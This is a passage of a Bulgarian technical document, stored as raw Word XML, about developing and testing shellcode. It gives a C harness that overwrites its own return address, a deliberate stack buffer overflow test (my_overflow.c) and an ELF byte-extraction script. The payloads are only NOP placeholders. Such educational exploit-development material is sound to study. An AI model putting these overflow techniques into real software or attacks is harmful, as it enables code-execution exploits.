    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Шелкодът е само товар, което прави функционалното му тестване проблемно, тъй като той не може да бъде директно изпълнен. За целта използваме две решения:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="12"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Добавяне на информация за линкване на шелкода в цялостна програма. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Това изисква само три директиви към асемблера: </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>“.global _start</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> “, “</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>.text</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>” и “</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>_start</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>” символ. Сега той може да се асемблира в обектен файл с “</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>as -g -o shellcode.o shellcode.s</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>”. “</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:t>-g</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">” флагът е за по-удобно поведение в gdb. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Обектният файл може да бъде линкнат с “</w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>ld shellcode.o</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>” и изпълнен. За да избегнат нулеви байтове някои шелкод реализации презаписват стойности в тялото си. С такова тестване кодът е в .text секцията, която не е маркирана за писане и писането</w:t>
      </w:r>
      <w:r w:rsidRPr="00326004">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>ѝ</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> приключва в segmentation fault. Това също се решава по два начина: изнасянето на информацията в .data секцията или добавянето на флаг “-N” на ld. Използваме втория вариант, за по-лесно изваждане на готовия шелкод от финалния файл и тестване със следващия подход.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="001009CF">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Тестова програма, която пресъздава реална обстановка</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">test_shellcode.c (идеята е взаимствана от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>Smashing the stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> NOTEREF _Ref2190500 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>long *ret;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>char shellcode[] = "\x90\x90\x90";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>ret = ((long *) &amp;ret) + 2;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>*ret = (long) shellcode;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>return 333;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: test_shellcode.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Тази програма просто променя адреса си за връщане и изпълнява кода в </w:t>
      </w:r>
      <w:r w:rsidRPr="00532C4C">
        <w:rPr>
          <w:rStyle w:val="codeChar"/>
        </w:rPr>
        <w:t>char shellcode[]</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t>. Тя е удобна за тестване на инструментите за извличане на шелкода от изпълним файл и онагледяване на самите байтове.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_mm22hbymefn6" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="75" w:name="_Toc3540775"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidRPr="00112660">
        <w:t>Тест за buffer overflow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>Overflow_example.c добре демонстрира проблема, но е труден за използване за тестване, защото шелкодът трябва да бъде подаван от стандартен вход, за което би трябвала някаква автоматизация, най-малко за уцелване на адреса. По-лесно е да бъде директно вграден и тестван в една програма, което може да стане и ръчно. Примерът my_overflow.c е точно такъв тест:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>my_overflow.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>char shellcode[] = "\x90\x90";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>int i = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>int main() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>char buffer[128];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>long *ptr = (long *) buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>for (i = 0; i &lt; 20; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>ptr[i] = (long) buffer;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>for (i = 0; i &lt; sizeof(shellcode); i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>buffer[i] = shellcode[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>return 12;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: my_overflow.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Той има даден шелкод и го прекарва през препълване на буфер, като единственото </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve">нереалистично е, че слага правилния адрес за връщане. В този </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>пример би трябвало да</w:t>
      </w:r>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve"> се проявят всички проблеми на кода, например нулеви байтове.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00CF6AEC" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
        <w:rPr>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>За жалост броячът i трябва да бъде глобална променлива, защото gcc подрежда променливите на стека във възходящ ред по размер. Това означава, че ако i е локална променлива, тя ще има по-висок адрес от buffer, и когато buffer прелее се презаписва i и копирането спира. Това може да се избегне с clang, който не прави такова преподреждане и декларирането на i последно би го поставило на очакваното му място в стека.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_xuol6et5puz7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="77" w:name="_Toc3540776"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Скриптове</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>В процеса на разработка на шелкод се забелязват повтарящи се действия. Те могат да се автоматизират за забързване на процеса на разработка. Следните скриптове правят точно това и са прототипи за съответни функционалности на крайния инструмент.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_bx6nqghn9ojp" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="79" w:name="_Toc3540777"/>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidRPr="008227E1">
        <w:t>Extract</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>from elftools.elf import elffile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>import sys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>with open(sys.argv[1], 'br') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>dec = elffile.ELFFile(file)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:tab/>
        <w:t>shellcode = dec.get_section_by_name('.text').data()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>print('"{}"'.format(''.join('\\x{:02x}'.format(b) for b in shellcode)))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRDefault="005F56EB" w:rsidP="00DD0DC6">
      <w:pPr>
        <w:pStyle w:val="figuretext"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Фигура </w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> STYLEREF 1 \s </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:noBreakHyphen/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Фигура \* ARABIC \s 1 </w:instrText>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005F5FC6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00A02214">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: extractor.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="00CF6AEC">
      <w:pPr>
        <w:pStyle w:val="body"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t xml:space="preserve">Този </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve">кратък скрипт изважда байтовете на .text секцията на изпълним файл във формат ELF и ги форматира във формат удобен за вграждане в C програма. Изходът съответства на самият шелкод. Скриптът няма никаква валидация, защото е временен инструмент за разработка и неговите специфики са развити по-нататък. От тук се прилага конвенция, съобразена в гореописаните примери, че шелкодът е изцяло в .text секцията. Това не е идеален подход, но тази секция е под наш контрол. понеже кодът е на </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>асемблер</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A" w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve">има сигурност, че няма страничен код и така скриптът е максимално прост. Според добри практики за писане на </w:t>
      </w:r>
      <w:r w:rsidR="00B4067A">
        <w:rPr>
          <w:lang w:val="bg-BG"/>
        </w:rPr>
        <w:t>асемблер</w:t>
      </w:r>
      <w:r w:rsidR="00B4067A" w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF6AEC">
        <w:rPr>
          <w:rStyle w:val="bodyChar"/>
        </w:rPr>
        <w:t>информацията трябва да е в .data, но както личи от горните шелкод реализации, такова разделяне не е удобно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="008227E1">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_bnq2brn0ato4" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="81" w:name="_Toc3540778"/>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidRPr="008227E1">
        <w:lastRenderedPageBreak/>
        <w:t>Assemble</w:t>
      </w:r>
      <w:bookmarkEnd w:id="81"/>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>from elftools.elf import elffile</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
        <w:pStyle w:val="codeblock"/>
      </w:pPr>
      <w:r w:rsidRPr="00112660">
        <w:t>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F56EB" w:rsidRPr="00112660" w:rsidRDefault="005F56EB" w:rsidP="000B2140">
      <w:pPr>
